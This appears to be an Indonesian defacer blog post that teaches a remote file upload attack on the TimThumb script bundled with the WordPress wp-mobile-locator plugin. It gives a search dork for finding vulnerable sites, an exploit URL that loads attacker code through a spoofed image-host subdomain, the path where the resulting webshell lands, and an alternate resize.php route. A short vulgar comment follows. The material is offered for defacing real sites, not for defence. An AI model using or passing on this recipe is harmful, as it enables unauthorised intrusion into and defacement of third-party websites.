Wordpress Plugins Mobile Locator Timthumb 2.8.11 Remote File Upload
Haaai
Selamat Malam para defacer
Penjelasan singkat :
Wp-mobile-locator ...
adalah sebuah plugins wordpress sederhana berbasis plugins ... sederhana bukan ? hahahaha ...
oke next ...
POC :
1. find targets with dorks :
inurl:/wp-content/plugins/wp-mobile-locator/
2. exploit :
/timthumb.php
3. NOTE* : pastikan kamu mendapatkan sebuah subdomain yang terintegrasi pada uploader images website seperti picasa,flixr,blogger dll .
jika sudah ...
maka untuk itu silahkan tambahkan Code ini dibelakang timthumb.php
timthumb.php?src=<yourevilcode>
ex : <site>/wp-content/plugins/wp-mobile-locator/timthumb.php?src=http://picasa.target.com/kepo/files...
lalu ENTER
jika berhasil maka webshellnya berada di path :
/wp-content/plugins/wp-mobile-detector/cache/kepo.php
JALAN LAIN ?
di resize.php
POCnya ? Sama seperti diatas :) ...
selamat mencoba ~
Terima Kasih Mr.XSecr3t | Indonesian Cyber DarkNet Team :)
buat tutor mabok anjing
ReplyDelete